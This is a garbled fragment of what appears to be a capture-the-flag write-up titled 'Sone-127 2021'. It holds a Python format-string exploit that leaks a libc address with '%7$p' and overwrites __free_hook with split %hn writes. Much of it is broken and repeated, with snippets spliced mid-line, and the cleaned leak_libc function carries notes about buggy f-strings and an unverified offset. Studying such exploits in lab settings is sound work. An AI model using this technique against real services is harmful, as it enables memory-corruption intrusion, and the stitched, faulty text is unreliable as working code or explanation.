
Sone-127 2021 Online

# 1️⃣ Leak libc libc_base = leak_libc(io)

def main(): io = remote(HOST, PORT)

%addr_lowc%8$hn%addr_highc%9$hn Because the target address ( __free_hook ) is 8‑byte aligned, we split it into two 2‑byte halves and write with %hn (write 2 bytes). SONE-127 2021

# Script entry point: only run when executed directly, not when imported.
if __name__ == "__main__":
    main()

The final crafted string (Python example): # 1️⃣ Leak libc libc_base = leak_libc(io) def

target = free_hook low = target & 0xffff high = (target >> 16) & 0xffff 16) & 0xffff def leak_libc(io): io.sendlineafter(b'&gt

def leak_libc(io):
    """Compute the libc base from the pointer the target echoes back.

    Sends the ``%7$p`` query through the ``> `` prompt, parses the hex value
    that follows ``echo `` in the reply, and rebases it on the
    ``__libc_start_main`` symbol of the ``libc`` object in scope.

    Args:
        io: connection object exposing ``sendlineafter``, ``recvuntil`` and
            ``recvline`` (presumably a pwntools tube; ``log`` and ``libc``
            are likewise expected from the enclosing module -- confirm).

    Returns:
        int: the computed libc base address.

    Raises:
        ValueError: if the echoed line does not parse as a hexadecimal number.
    """
    io.sendlineafter(b'> ', b'echo %7$p')
    io.recvuntil(b'echo ')
    leak = int(io.recvline().strip(), 16)
    # NOTE(review): this f-string (and the one below) has no ``{}`` placeholder,
    # so the literal text ``hex(leak)`` is logged rather than the value;
    # ``{hex(leak)}`` was presumably intended.
    log.success(f'Leaked address: hex(leak)')
    # __libc_start_main+231 is the usual location we see; adjust if needed
    # (the 231 offset is build-specific and is not verified here).
    libc_start_main_ret = leak - 231
    libc_base = libc_start_main_ret - libc.sym['__libc_start_main']
    log.info(f'Libc base: hex(libc_base)')
    return libc_base